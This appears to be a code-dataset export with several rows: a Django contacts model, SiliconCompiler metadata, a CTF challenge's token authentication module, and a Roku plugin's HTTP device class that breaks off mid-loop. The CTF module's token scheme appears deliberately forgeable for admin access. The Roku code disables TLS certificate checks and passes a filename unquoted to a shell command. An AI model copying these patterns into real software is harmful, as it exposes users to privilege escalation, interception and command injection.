   middle = u"%s." % self.middlename[:2]
   #middle = self.middlename[0]
  return u"%s %s%s" % (last, first, middle)
 initials = property(_get_initials)
 def get_phones(self):
  # Space-separated string of all attached phones, for admin list display.
  # NOTE(review): relies on a 'phones' relation that is not declared on this
  # model in this file -- verify it exists (e.g. a related_name elsewhere).
  phone_list = u""
  for phone in self.phones.all():
   phone_list = phone_list + u" %s" % phone
  return phone_list
 class Meta:
  verbose_name = _('Person')
  verbose_name_plural = _('People')
 class Admin:
  js = ('/site_media/js/tags.js',)
  fields = (
   (None, {'fields': ('lastname','firstname','middlename','town','info', 'web','email','im')}),
   ('Date information',{'classes':'collapse','fields':('createuser','modifyuser','createdate','modifydate')}),
  )
  list_display = ('fullname', 'get_phones', 'email', 'town', 'createuser', 'modifyuser')
  search_fields = ('lastname', 'firstname', 'middlename', 'info')
 def colored_name(self):
  # HTML-decorated last name for admin list display.
  return '<span style="color: red;">%s</span>' % (self.lastname)
 colored_name.allow_tags = True
 def __unicode__(self):
  last = u""
  first = u""
  middle = u""
  if self.lastname:
   last = u"%s" % self.lastname
  if self.firstname:
   first = u"%s" % self.firstname
  if self.middlename:  # BUGFIX: previously tested self.firstname before reading middlename
   middle = u"%s" % self.middlename
  return u"%s %s %s" % (last, first, middle)
class Orgtype(models.Model):
 # Dictionary table of organization types (short code + name), with audit fields.
 code = models.CharField(_('Orgtype Code'), max_length=10)
 name = models.CharField(_('Orgtype Name'), max_length=60)
 createuser = models.ForeignKey(User, related_name='created_orgtypes', blank=True, null=True)
 createdate = models.DateTimeField(blank=True, auto_now_add=True)
 modifyuser = models.ForeignKey(User, related_name='modified_orgtypes', blank=True, null=True)
 modifydate = models.DateTimeField(blank=True, auto_now=True)
 class Meta:
  verbose_name = _('Org Type')
  verbose_name_plural = _('Org Types')
 class Admin:
  fields = (
   (None, {'fields': ('code','name', )}),
  )
 def __unicode__(self):
  # Show the short code in admin/select widgets.
  return u"%s" % self.code
class Org(models.Model):
 # An organization; can be marked as a client via the generic relation.
 type = models.ForeignKey(Orgtype, blank=True, null=True, verbose_name=_('Org Type'))
 code = models.CharField(_('Org Code'), max_length=15, blank=True)
 alias = models.CharField(_('Org Alias'), max_length=100, blank=True)
 name = models.CharField(_('Org Name'), max_length=200,blank=True)
 fullname = models.CharField(_('Org Full Name'), max_length=200,blank=True)
 #org_parentref = models.ForeignKey('self', null=True, blank=True)
 town = models.ForeignKey(Town, blank=True, null=True, verbose_name=_('Town'))
 #phones = PhonesField(Phone, blank=True)
 email = models.EmailField(_('Email'), blank=True) #FIXME:, validator_list=[isValidEmail])
 http = models.CharField(_('Web Site'), max_length=40,blank=True)
 info = models.TextField(_('Info'), max_length=256, blank=True, help_text='Rich Text Editing.')
 contacted = models.DateField(blank=True, null=True)
 createuser = models.ForeignKey(User, related_name='created_orgs', blank=True, null=True)
 createdate = models.DateTimeField(blank=True, auto_now_add=True)
 modifyuser = models.ForeignKey(User, related_name='modified_orgs', blank=True, null=True)
 modifydate = models.DateTimeField(blank=True, auto_now=True)
 clients = generic.GenericRelation(Client) #, verbose_name=_('Client'), blank=True, null=True)
 class Meta:
  verbose_name = _('Organization')
  verbose_name_plural = _('Organizations')
 class Admin:
  js = ('/site_media/js/tags.js',)
  fields = (
   (None, {'fields': ('type', 'code', 'alias', 'name', 'fullname', 'town', 'email', 'http', 'info', 'contacted')}),
   ('Date information', {'classes': 'collapse', 'fields': ('createuser', 'modifyuser', 'createdate', 'modifydate')}),
  )
  list_display = ('code', 'name', 'get_phones', 'email', 'createuser', 'modifyuser')
  search_fields = ['code', 'alias', 'name', 'fullname', 'email', 'info']
 def __unicode__(self):
  return u"%s" % self.name
 def get_phones(self):
  # Space-separated string of all attached phones, for admin list display.
  # NOTE(review): relies on a 'phones' relation that is not declared on this
  # model in this file -- verify it exists (e.g. a related_name elsewhere).
  phone_list = u""
  for phone in self.phones.all():
   phone_list = phone_list + u" %s" % phone
  return phone_list
 def _is_client(self):
  # True when at least one Client row points at this organization.
  if self.client_set.count():
   return True
  else:
   return False
 is_client = property(_is_client)
 def getShortLegalName(self):
  # "<type> <name>" when a legal type is set, otherwise just the name.
  if self.type:
   legal_name = u"%s %s" % (self.type, self.name)
  else:
   legal_name = u"%s" % self.name
  return legal_name
#admin.site.register(Person)
|
en
| 0.235892
|
# # # #from django.core import validators #from django.core.validators import isValidEmail #addr_code = models.CharField(_('Street Code'), max_length=6) #FIXME: shortname is too short #shortname = models.CharField(_('Region Code'), max_length=6, unique=True, blank=True) #code = models.CharField(_('Town Code'), max_length=6) #Is Region Centre? #Is District Centre? #js = ('js/tiny_mce/tiny_mce.js','js/tiny_mce/textareas.js'), #addr_code = models.CharField(_('Street Code'), max_length=6) #type = models.ForeignKey(StreetType, null=True) #FIXME:, blank=True, null=True) #from django.contrib.contenttypes.models import ContentType #, core=True) #FIXME:, validator_list=[isValidEmail]) #, verbose_name=_('Client'), blank=True, null=True) #first = self.firstname[0] #middle = self.middlename[0] #org_parentref = models.ForeignKey('self', null=True, blank=True) #phones = PhonesField(Phone, blank=True) #FIXME:, validator_list=[isValidEmail]) #, verbose_name=_('Client'), blank=True, null=True) #admin.site.register(Person)
| 1.93815
| 2
|
siliconcompiler/_metadata.py
|
mfkiwl/siliconcompiler
| 0
|
6627640
|
# Version number following semver standard.
version = '0.5.0'
# This is the list of significant contributors to SiliconCompiler in
# chronological order.
#
# This does not necessarily list everyone who has contributed code,
# especially since many employees of one corporation may be contributing.
# To see the full list of contributors, see the git revision history
authors = [
 '<NAME>',
 '<NAME>',
 '<NAME>',
 '<NAME>'
]
# CLI entry banner autogenerated using pyfiglet.
# >> pyfiglet.figlet_format("Silicon Compiler")
# NOTE: raw string -- the ASCII art contains backslash sequences (\_, \|)
# that are invalid escapes in a normal string literal and raise
# SyntaxWarning on modern Python; the rendered text is unchanged.
banner = r'''
 ____ _ _ _ ____ _ _
 / ___|(_) (_) ___ ___ _ __ / ___|___ _ __ ___ _ __ (_) | ___ _ __
 \___ \| | | |/ __/ _ \| '_ \ | | / _ \| '_ ` _ \| '_ \| | |/ _ \ '__|
 ___) | | | | (_| (_) | | | | | |__| (_) | | | | | | |_) | | | __/ |
 |____/|_|_|_|\___\___/|_| |_| \____\___/|_| |_| |_| .__/|_|_|\___|_|
 |_|
'''
|
# Version number following semver standard.
version = '0.5.0'
# This is the list of significant contributors to SiliconCompiler in
# chronological order.
#
# This does not necessarily list everyone who has contributed code,
# especially since many employees of one corporation may be contributing.
# To see the full list of contributors, see the git revision history
authors = [
 '<NAME>',
 '<NAME>',
 '<NAME>',
 '<NAME>'
]
# CLI entry banner autogenerated using pyfiglet.
# >> pyfiglet.figlet_format("Silicon Compiler")
# NOTE: raw string -- the ASCII art contains backslash sequences (\_, \|)
# that are invalid escapes in a normal string literal and raise
# SyntaxWarning on modern Python; the rendered text is unchanged.
banner = r'''
 ____ _ _ _ ____ _ _
 / ___|(_) (_) ___ ___ _ __ / ___|___ _ __ ___ _ __ (_) | ___ _ __
 \___ \| | | |/ __/ _ \| '_ \ | | / _ \| '_ ` _ \| '_ \| | |/ _ \ '__|
 ___) | | | | (_| (_) | | | | | |__| (_) | | | | | | |_) | | | __/ |
 |____/|_|_|_|\___\___/|_| |_| \____\___/|_| |_| |_| .__/|_|_|\___|_|
 |_|
'''
|
en
| 0.636025
|
# Version number following semver standard. # This is the list of significant contributors to SiliconCompiler in # chronological order. # # This does not necessarily list everyone who has contributed code, # especially since many employees of one corporation may be contributing. # To see the full list of contributors, see the git revision history # CLI entry banner autogenerated using pyfiglet. # >> pyfiglet.figlet_format("Silicon Compiler") ____ _ _ _ ____ _ _ / ___|(_) (_) ___ ___ _ __ / ___|___ _ __ ___ _ __ (_) | ___ _ __ \___ \| | | |/ __/ _ \| '_ \ | | / _ \| '_ ` _ \| '_ \| | |/ _ \ '__| ___) | | | | (_| (_) | | | | | |__| (_) | | | | | | |_) | | | __/ | |____/|_|_|_|\___\___/|_| |_| \____\___/|_| |_| |_| .__/|_|_|\___|_| |_|
| 1.340054
| 1
|
Pwnable/200-FromUserToAdmin/src/authentication.py
|
Probely/CTF-Challenges
| 42
|
6627641
|
import time
import struct
import base64
import crypto
import settings
BOX = crypto.Toolbox(settings.EKEY, settings.AKEY)  # shared encrypt/authenticate toolbox
MAX_USER_LEN = 12  # width of the username field inside the token, in bytes
MAX_TOKEN_LEN = 16  # username (12 bytes) + big-endian expiry timestamp (4 bytes)
USER_PADDING = '\0'  # pad byte appended to short usernames
def generate_token(username, ttl=7200):
 """Return a urlsafe-base64, encrypted token for `username` valid for `ttl` seconds."""
 # A token is a base64-encoded, encrypted, binary structure as follows:
 # [padded username (12 bytes)][time to live (4 byte big-endian integer)]
 #
 # Example for username "user":
 # 'user\x00\x00\x00\x00\x00\x00\x00\x00W\xea\xae\xd9'
 # Example for username "admin":
 # 'admin\x00\x00\x00\x00\x00\x00\x00W\xea\xae\xd9'
 until = int(time.time()) + ttl  # absolute expiry as a unix timestamp
 until_bytes = struct.pack('>I', until)
 # Truncate user to MAX_USER_LEN bytes
 username = username[:MAX_USER_LEN]
 # Pad it, if required
 delta = MAX_USER_LEN - len(username)
 if delta > 0:
  username += '\0' * delta
 plaintext = username + until_bytes
 ciphertext = BOX.encrypt(plaintext)
 token = base64.urlsafe_b64encode(ciphertext)
 return token
def verify_token(token):
 """Decode `token` and return its username if valid and unexpired, else None."""
 try:
  ciphertext = base64.urlsafe_b64decode(token)
 except (AttributeError, ValueError, TypeError):
  return None
 plaintext = BOX.decrypt(ciphertext)
 if plaintext is None or len(plaintext) != MAX_TOKEN_LEN:
  return None
 try:
  # Username is everything before the first pad byte.  A full 12-byte
  # username contains no pad byte, so the 1-element split result fails to
  # unpack (ValueError) and the token is rejected.
  user, _ = plaintext.split('\0', 1)
 except (AttributeError, ValueError, TypeError):
  return None
 until_bytes = plaintext[-4:]  # trailing 4 bytes: big-endian expiry timestamp
 try:
  until = struct.unpack('>I', until_bytes)
 except (AttributeError, ValueError, TypeError):
  return None
 else:
  until = until[0]
 now = int(time.time())
 if now < until:
  return user
 else:
  return None
|
import time
import struct
import base64
import crypto
import settings
BOX = crypto.Toolbox(settings.EKEY, settings.AKEY)  # shared encrypt/authenticate toolbox
MAX_USER_LEN = 12  # width of the username field inside the token, in bytes
MAX_TOKEN_LEN = 16  # username (12 bytes) + big-endian expiry timestamp (4 bytes)
USER_PADDING = '\0'  # pad byte appended to short usernames
def generate_token(username, ttl=7200):
 """Return a urlsafe-base64, encrypted token for `username` valid for `ttl` seconds."""
 # A token is a base64-encoded, encrypted, binary structure as follows:
 # [padded username (12 bytes)][time to live (4 byte big-endian integer)]
 #
 # Example for username "user":
 # 'user\x00\x00\x00\x00\x00\x00\x00\x00W\xea\xae\xd9'
 # Example for username "admin":
 # 'admin\x00\x00\x00\x00\x00\x00\x00W\xea\xae\xd9'
 until = int(time.time()) + ttl  # absolute expiry as a unix timestamp
 until_bytes = struct.pack('>I', until)
 # Truncate user to MAX_USER_LEN bytes
 username = username[:MAX_USER_LEN]
 # Pad it, if required
 delta = MAX_USER_LEN - len(username)
 if delta > 0:
  username += '\0' * delta
 plaintext = username + until_bytes
 ciphertext = BOX.encrypt(plaintext)
 token = base64.urlsafe_b64encode(ciphertext)
 return token
def verify_token(token):
 """Decode `token` and return its username if valid and unexpired, else None."""
 try:
  ciphertext = base64.urlsafe_b64decode(token)
 except (AttributeError, ValueError, TypeError):
  return None
 plaintext = BOX.decrypt(ciphertext)
 if plaintext is None or len(plaintext) != MAX_TOKEN_LEN:
  return None
 try:
  # Username is everything before the first pad byte.  A full 12-byte
  # username contains no pad byte, so the 1-element split result fails to
  # unpack (ValueError) and the token is rejected.
  user, _ = plaintext.split('\0', 1)
 except (AttributeError, ValueError, TypeError):
  return None
 until_bytes = plaintext[-4:]  # trailing 4 bytes: big-endian expiry timestamp
 try:
  until = struct.unpack('>I', until_bytes)
 except (AttributeError, ValueError, TypeError):
  return None
 else:
  until = until[0]
 now = int(time.time())
 if now < until:
  return user
 else:
  return None
|
en
| 0.285723
|
# A token is a base64-encoded, encrypted, binary structure as follows: # [padded username (12 bytes)][time to live (4 byte big-endian integer)] # # Example for username "user": # 'user\x00\x00\x00\x00\x00\x00\x00\x00W\xea\xae\xd9' # Example for username "admin": # 'admin\x00\x00\x00\x00\x00\x00\x00W\xea\xae\xd9' # Truncate user to MAX_USER_LEN bytes # Pad it, if required
| 2.801836
| 3
|
Roku Network Remote.indigoPlugin/Contents/Server Plugin/RPFramework/RPFrameworkRESTfulDevice.py
|
RogueProeliator/IndigoPlugins-Roku-Network-Remote
| 1
|
6627642
|
<reponame>RogueProeliator/IndigoPlugins-Roku-Network-Remote<filename>Roku Network Remote.indigoPlugin/Contents/Server Plugin/RPFramework/RPFrameworkRESTfulDevice.py
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
# RPFrameworkRESTfulDevice by RogueProeliator <<EMAIL>>
# This class is a concrete implementation of the RPFrameworkDevice as a device which
# communicates via a REST style HTTP connection.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
# Python imports
#/////////////////////////////////////////////////////////////////////////////////////////
import functools
import httplib
import indigo
import Queue
import os
import re
import string
import subprocess
import sys
import threading
import telnetlib
import time
import urllib
import urllib2
from urlparse import urlparse
import requests
from requests.auth import HTTPDigestAuth
import RPFrameworkPlugin
import RPFrameworkCommand
import RPFrameworkDevice
import RPFrameworkNetworkingWOL
import RPFrameworkUtils
#/////////////////////////////////////////////////////////////////////////////////////////
# Constants and configuration variables
#/////////////////////////////////////////////////////////////////////////////////////////
# Command-queue identifiers processed by the device's concurrent thread.
CMD_RESTFUL_PUT = u'RESTFUL_PUT'
CMD_RESTFUL_GET = u'RESTFUL_GET'
CMD_SOAP_REQUEST = u'SOAP_REQUEST'
CMD_JSON_REQUEST = u'JSON_REQUEST'
CMD_DOWNLOADFILE = u'DOWNLOAD_FILE'
CMD_DOWNLOADIMAGE = u'DOWNLOAD_IMAGE'
# GUI-config keys controlling the status poller and queue wait behavior.
GUI_CONFIG_RESTFULSTATUSPOLL_INTERVALPROPERTY = u'updateStatusPollerIntervalProperty'
GUI_CONFIG_RESTFULSTATUSPOLL_ACTIONID = u'updateStatusPollerActionId'
GUI_CONFIG_RESTFULSTATUSPOLL_STARTUPDELAY = u'updateStatusPollerStartupDelay'
GUI_CONFIG_RESTFULDEV_EMPTYQUEUE_SPEEDUPCYCLES = u'emptyQueueReducedWaitCycles'
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
# RPFrameworkRESTfulDevice
# This class is a concrete implementation of the RPFrameworkDevice as a device which
# communicates via a REST style HTTP connection.
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
class RPFrameworkRESTfulDevice(RPFrameworkDevice.RPFrameworkDevice):
	"""Concrete RPFrameworkDevice which communicates with its hardware via
	REST-style HTTP calls (GET/PUT), SOAP/JSON posts and binary file downloads.

	Concrete device classes must override getRESTfulDeviceAddress() to supply
	the (host, port) pair; the remaining hooks are optional overrides.
	"""

	#/////////////////////////////////////////////////////////////////////////////////////
	# Class construction and destruction methods
	#/////////////////////////////////////////////////////////////////////////////////////
	#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
	# Constructor called once upon plugin class receiving a command to start device
	# communication. Defers to the base class for processing but initializes params
	#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
	def __init__(self, plugin, device):
		"""Initialize the device; all setup is deferred to the RPFrameworkDevice base."""
		super(RPFrameworkRESTfulDevice, self).__init__(plugin, device)

	#/////////////////////////////////////////////////////////////////////////////////////
	# Processing and command functions
	#/////////////////////////////////////////////////////////////////////////////////////
	#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
	# This routine is designed to run in a concurrent thread and will continuously monitor
	# the commands queue for work to do.
	#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
	def concurrentCommandProcessingThread(self, commandQueue):
		"""Main worker loop for the device; runs in its own thread.

		Continuously drains commandQueue, dispatching each RPFrameworkCommand by
		name (framework lifecycle commands, RESTful GET/PUT, SOAP/JSON posts,
		file/image downloads, Wake-on-LAN) until a terminate command arrives.
		Unknown commands are forwarded to handleUnmanagedCommandInQueue.

		:param commandQueue: Queue.Queue of RPFrameworkCommand objects to process
		"""
		try:
			self.hostPlugin.logger.debug(u'Concurrent Processing Thread started for device {0}'.format(self.indigoDevice.id))

			# obtain the IP or host address that will be used in connecting to the
			# RESTful service via a function call to allow overrides
			deviceHTTPAddress = self.getRESTfulDeviceAddress()
			if deviceHTTPAddress is None:
				self.hostPlugin.logger.error(u'No IP address specified for device {0}; ending command processing thread.'.format(self.indigoDevice.id))
				return

			# retrieve any configuration information that may have been setup in the
			# plugin configuration and/or device configuration
			updateStatusPollerPropertyName = self.hostPlugin.getGUIConfigValue(self.indigoDevice.deviceTypeId, GUI_CONFIG_RESTFULSTATUSPOLL_INTERVALPROPERTY, u'updateInterval')
			updateStatusPollerInterval = int(self.indigoDevice.pluginProps.get(updateStatusPollerPropertyName, u'90'))
			updateStatusPollerNextRun = None
			updateStatusPollerActionId = self.hostPlugin.getGUIConfigValue(self.indigoDevice.deviceTypeId, GUI_CONFIG_RESTFULSTATUSPOLL_ACTIONID, u'')
			emptyQueueReducedWaitCycles = int(self.hostPlugin.getGUIConfigValue(self.indigoDevice.deviceTypeId, GUI_CONFIG_RESTFULDEV_EMPTYQUEUE_SPEEDUPCYCLES, u'80'))

			# begin the infinite loop which will run as long as the queue contains commands
			# and we have not received an explicit shutdown request
			continueProcessingCommands = True
			lastQueuedCommandCompleted = 0
			while continueProcessingCommands == True:
				# process pending commands now...
				while not commandQueue.empty():
					lenQueue = commandQueue.qsize()
					self.hostPlugin.logger.threaddebug(u'Command queue has {0} command(s) waiting'.format(lenQueue))

					# the command name will identify what action should be taken... we will handle the known
					# commands and dispatch out to the device implementation, if necessary, to handle unknown
					# commands
					command = commandQueue.get()
					if command.commandName == RPFrameworkCommand.CMD_INITIALIZE_CONNECTION:
						# specialized command to instanciate the concurrent thread
						# safely ignore this... just used to spin up the thread
						self.hostPlugin.logger.threaddebug(u'Create connection command de-queued')

						# if the device supports polling for status, it may be initiated here now; however, we should implement a pause to ensure that
						# devices are created properly (RESTFul devices may respond too fast since no connection need be established)
						statusUpdateStartupDelay = float(self.hostPlugin.getGUIConfigValue(self.indigoDevice.deviceTypeId, GUI_CONFIG_RESTFULSTATUSPOLL_STARTUPDELAY, u'3'))
						if statusUpdateStartupDelay > 0.0:
							commandQueue.put(RPFrameworkCommand.RPFrameworkCommand(RPFrameworkCommand.CMD_PAUSE_PROCESSING, commandPayload=str(statusUpdateStartupDelay)))
						commandQueue.put(RPFrameworkCommand.RPFrameworkCommand(RPFrameworkCommand.CMD_UPDATE_DEVICE_STATUS_FULL, parentAction=updateStatusPollerActionId))

					elif command.commandName == RPFrameworkCommand.CMD_TERMINATE_PROCESSING_THREAD:
						# a specialized command designed to stop the processing thread indigo
						# the event of a shutdown
						continueProcessingCommands = False

					elif command.commandName == RPFrameworkCommand.CMD_PAUSE_PROCESSING:
						# the amount of time to sleep should be a float found in the
						# payload of the command
						try:
							pauseTime = float(command.commandPayload)
							self.hostPlugin.logger.threaddebug(u'Initiating sleep of {0} seconds from command.'.format(pauseTime))
							time.sleep(pauseTime)
						except:
							self.hostPlugin.logger.warning(u'Invalid pause time requested')

					elif command.commandName == RPFrameworkCommand.CMD_UPDATE_DEVICE_STATUS_FULL:
						# this command instructs the plugin to update the full status of the device (all statuses
						# that may be read from the device should be read)
						if updateStatusPollerActionId != u'':
							self.hostPlugin.logger.debug(u'Executing full status update request...')
							self.hostPlugin.executeAction(None, indigoActionId=updateStatusPollerActionId, indigoDeviceId=self.indigoDevice.id, paramValues=None)
							updateStatusPollerNextRun = time.time() + updateStatusPollerInterval
						else:
							self.hostPlugin.logger.threaddebug(u'Ignoring status update request, no action specified to update device status')

					elif command.commandName == RPFrameworkCommand.CMD_NETWORKING_WOL_REQUEST:
						# this is a request to send a Wake-On-LAN request to a network-enabled device
						# the command payload should be the MAC address of the device to wake up
						try:
							RPFrameworkNetworkingWOL.sendWakeOnLAN(command.commandPayload)
						except:
							self.hostPlugin.logger.error(u'Failed to send Wake-on-LAN packet')

					elif command.commandName == CMD_RESTFUL_GET or command.commandName == CMD_RESTFUL_PUT or command.commandName == CMD_DOWNLOADFILE or command.commandName == CMD_DOWNLOADIMAGE:
						try:
							self.hostPlugin.logger.debug(u'Processing GET operation: {0}'.format(command.commandPayload))

							# gather all of the parameters from the command payload
							# the payload should have the following format:
							# [0] => request method (http|https|etc.)
							# [1] => path for the GET operation
							# [2] => authentication type: none|basic|digest
							# [3] => username
							# [4] => password
							#
							# CMD_DOWNLOADFILE or CMD_DOWNLOADIMAGE
							# [5] => download filename/path
							# [6] => image resize width
							# [7] => image resize height
							#
							# CMD_RESTFUL_PUT
							# [5] => data to post as the body (if any, may be blank)
							commandPayloadList = command.getPayloadAsList()
							fullGetUrl = commandPayloadList[0] + u'://' + deviceHTTPAddress[0] + u':' + RPFrameworkUtils.to_unicode(deviceHTTPAddress[1]) + commandPayloadList[1]
							self.hostPlugin.logger.threaddebug(u'Full URL for GET: {0}'.format(fullGetUrl))

							customHeaders = {}
							self.addCustomHTTPHeaders(customHeaders)

							authenticationParam = None
							authenticationType = u'none'
							username = u''
							password = u''
							if len(commandPayloadList) >= 3:
								authenticationType = commandPayloadList[2]
							if len(commandPayloadList) >= 4:
								username = commandPayloadList[3]
							if len(commandPayloadList) >= 5:
								password = commandPayloadList[4]
							if authenticationType != 'none' and username != u'':
								self.hostPlugin.logger.threaddebug(u'Using login credentials... Username=> {0}; Password=>{1} <PASSWORD>'.format(username, len(password)))
								if authenticationType.lower() == 'digest':
									self.hostPlugin.logger.threaddebug(u'Enabling digest authentication')
									authenticationParam = HTTPDigestAuth(username, password)
								else:
									authenticationParam = (username, password)

							# execute the URL fetching depending upon the method requested
							if command.commandName == CMD_RESTFUL_GET or command.commandName == CMD_DOWNLOADFILE or command.commandName == CMD_DOWNLOADIMAGE:
								responseObj = requests.get(fullGetUrl, auth=authenticationParam, headers=customHeaders, verify=False)
							elif command.commandName == CMD_RESTFUL_PUT:
								dataToPost = None
								if len(commandPayloadList) >= 6:
									dataToPost = commandPayloadList[5]
								responseObj = requests.post(fullGetUrl, auth=authenticationParam, headers=customHeaders, verify=False, data=dataToPost)

							# if the network command failed then allow the error processor to handle the issue
							if responseObj.status_code == 200:
								# the response handling will depend upon the type of command... binary returns must be
								# handled separately from (expected) text-based ones
								if command.commandName == CMD_DOWNLOADFILE or command.commandName == CMD_DOWNLOADIMAGE:
									# this is a binary return that should be saved to the file system without modification
									if len(commandPayloadList) >= 6:
										saveLocation = commandPayloadList[5]

										# execute the actual save from the binary response stream;
										# pre-bind localFile so that the finally clause cannot raise
										# a NameError (masking the real error) if open() itself fails
										localFile = None
										try:
											localFile = open(RPFrameworkUtils.to_str(saveLocation), "wb")
											localFile.write(responseObj.content)
											self.hostPlugin.logger.threaddebug(u'Command Response: [{0}] -=- binary data written to {1}-=-'.format(responseObj.status_code, saveLocation))

											if command.commandName == CMD_DOWNLOADIMAGE:
												imageResizeWidth = 0
												imageResizeHeight = 0
												if len(command.commandPayload) >= 7:
													imageResizeWidth = int(command.commandPayload[6])
												if len(command.commandPayload) >= 8:
													imageResizeHeight = int(command.commandPayload[7])

												resizeCommandLine = u''
												if imageResizeWidth > 0 and imageResizeHeight > 0:
													# we have a specific size as a target...
													resizeCommandLine = u'sips -z {0} {1} {2}'.format(imageResizeHeight, imageResizeWidth, saveLocation)
												elif imageResizeWidth > 0:
													# we have a maximum size measurement
													resizeCommandLine = u'sips -Z {0} {1}'.format(imageResizeWidth, saveLocation)

												# if a command line has been formed, fire that off now...
												if resizeCommandLine == u'':
													self.hostPlugin.logger.debug(u'No image size specified for {0}; skipping resize.'.format(saveLocation))
												else:
													self.hostPlugin.logger.threaddebug(u'Executing resize via command line "{0}"'.format(resizeCommandLine))
													try:
														subprocess.Popen(resizeCommandLine, shell=True)
														self.hostPlugin.logger.debug(u'{0} resized via sip shell command'.format(saveLocation))
													except:
														self.hostPlugin.logger.error(u'Error resizing image via sips')

											# we have completed the download and processing successfully... allow the
											# device (or its descendants) to process successful operations
											self.notifySuccessfulDownload(command, saveLocation)
										finally:
											if not localFile is None:
												localFile.close()
									else:
										self.hostPlugin.logger.error(u'Unable to complete download action - no filename specified')
								else:
									# handle this return as a text-based return
									self.hostPlugin.logger.threaddebug(u'Command Response: [{0}] {1}'.format(responseObj.status_code, responseObj.text))
									self.hostPlugin.logger.threaddebug(u'{0} command completed; beginning response processing'.format(command.commandName))
									self.handleDeviceTextResponse(responseObj, command)
									self.hostPlugin.logger.threaddebug(u'{0} command response processing completed'.format(command.commandName))

							elif responseObj.status_code == 401:
								self.handleRESTfulError(command, u'401 - Unauthorized', responseObj)

							else:
								self.handleRESTfulError(command, str(responseObj.status_code), responseObj)

						except Exception as e:
							# the response value really should not be defined here as it bailed without
							# catching any of our response error conditions
							self.handleRESTfulError(command, e, None)

					elif command.commandName == CMD_SOAP_REQUEST or command.commandName == CMD_JSON_REQUEST:
						responseObj = None
						try:
							# this is to post a SOAP request to a web service... this will be similar to a restful put request
							# but will contain a body payload
							self.hostPlugin.logger.threaddebug(u'Received SOAP/JSON command request: {0}'.format(command.commandPayload))
							soapPayloadParser = re.compile(r"^\s*([^\n]+)\n\s*([^\n]+)\n(.*)$", re.DOTALL)
							soapPayloadData = soapPayloadParser.match(command.commandPayload)
							soapPath = soapPayloadData.group(1).strip()
							soapAction = soapPayloadData.group(2).strip()
							soapBody = soapPayloadData.group(3).strip()
							fullGetUrl = u'http://' + deviceHTTPAddress[0] + u':' + RPFrameworkUtils.to_str(deviceHTTPAddress[1]) + RPFrameworkUtils.to_str(soapPath)
							self.hostPlugin.logger.debug(u'Processing SOAP/JSON operation to {0}'.format(fullGetUrl))

							customHeaders = {}
							self.addCustomHTTPHeaders(customHeaders)
							if command.commandName == CMD_SOAP_REQUEST:
								customHeaders["Content-type"] = "text/xml; charset=\"UTF-8\""
								customHeaders["SOAPAction"] = RPFrameworkUtils.to_str(soapAction)
							else:
								customHeaders["Content-type"] = "application/json"

							# execute the URL post to the web service
							self.hostPlugin.logger.threaddebug(u'Sending SOAP/JSON request:\n{0}'.format(soapBody))
							self.hostPlugin.logger.threaddebug(u'Using headers: \n{0}'.format(customHeaders))
							responseObj = requests.post(fullGetUrl, headers=customHeaders, verify=False, data=RPFrameworkUtils.to_str(soapBody))

							if responseObj.status_code == 200:
								# handle this return as a text-based return
								self.hostPlugin.logger.threaddebug(u'Command Response: [{0}] {1}'.format(responseObj.status_code, responseObj.text))
								self.hostPlugin.logger.threaddebug(u'{0} command completed; beginning response processing'.format(command.commandName))
								self.handleDeviceTextResponse(responseObj, command)
								self.hostPlugin.logger.threaddebug(u'{0} command response processing completed'.format(command.commandName))
							else:
								self.hostPlugin.logger.threaddebug(u'Command Response was not HTTP OK, handling RESTful error')
								self.handleRESTfulError(command, str(responseObj.status_code), responseObj)
						except Exception as e:
							self.handleRESTfulError(command, e, responseObj)

					else:
						# this is an unknown command; dispatch it to another routine which is
						# able to handle the commands (to be overridden for individual devices)
						self.handleUnmanagedCommandInQueue(deviceHTTPAddress, command)

					# if the command has a pause defined for after it is completed then we
					# should execute that pause now
					if command.postCommandPause > 0.0 and continueProcessingCommands == True:
						self.hostPlugin.logger.threaddebug(u'Post Command Pause: {0}'.format(command.postCommandPause))
						time.sleep(command.postCommandPause)

					# complete the dequeuing of the command, allowing the next
					# command in queue to rise to the top
					commandQueue.task_done()
					lastQueuedCommandCompleted = emptyQueueReducedWaitCycles

				# when the queue is empty, pause a bit on each iteration
				if continueProcessingCommands == True:
					# if we have just completed a command recently, half the amount of
					# wait time, assuming that a subsequent command could be forthcoming
					if lastQueuedCommandCompleted > 0:
						time.sleep(self.emptyQueueProcessingThreadSleepTime/2)
						lastQueuedCommandCompleted = lastQueuedCommandCompleted - 1
					else:
						time.sleep(self.emptyQueueProcessingThreadSleepTime)

					# check to see if we need to issue an update...
					if updateStatusPollerNextRun is not None and time.time() > updateStatusPollerNextRun:
